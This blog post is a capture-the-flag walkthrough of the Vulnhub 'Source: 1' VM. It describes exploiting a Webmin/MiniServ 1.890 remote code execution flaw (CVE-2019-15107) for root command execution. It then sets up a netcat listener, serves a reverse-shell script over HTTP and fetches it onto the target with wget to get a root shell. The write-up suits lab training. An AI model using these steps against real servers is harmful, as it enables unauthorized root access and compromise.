Today we are going to do a walkthrough of Source: 1 from Vulnhub.com. After getting the VM set up in VMWare Player, we start with our standard nmap scans.
Press enter or click to view image in full size
Port tcp/10000 is identified as MiniServ 1.890, so even before checking out the website my first thought was to search for vulnerabilities. A Google search of “miniserv 1.890 exploit” reveals a link for a Remote Code Execution Exploit: https://medium.com/@foxsin34/webmin-1-890-exploit-unauthorized-rce-cve-2019-15107-23e4d5a9c3b4
Download the Python script from the Github site and give it a try:
Wow, the RCE exploit has us executing commands as root! At this point, we can grab the root flag and call it a day.
Press enter or click to view image in full size
However, let’s go further and try to get a root shell. I tried to execute a number of root shells directly via the RCE, including nc, perl, python, etc. but had no luck. Then I attempted to upload several shells and finally got a hit with the NetCat OpenBSD shell from payloadsallthethings. Keep this one in your toolbelt, as it has worked for me several times lately when the more common netcat, python, etc. shells haven’t.
Get Jeff’s stories in your inbox
Join Medium for free to get updates from this writer.
Don’t forget to first launch your listener with “nc -nvlp 8001”. On my attacking machine, I created a file shell.sh with the NetCat OpenBSD shell code.
Launch SimpleHTTPServer with “sudo python -m SimpleHTTPServer 80” and then upload the shell script to the target with wget.
Press enter or click to view image in full size
Make the script executable.
Press enter or click to view image in full size
Then run the script.
Press enter or click to view image in full size
We get a root shell!
Thanks for reading. Did you get a shell another way? Leave me a comment with how you did it.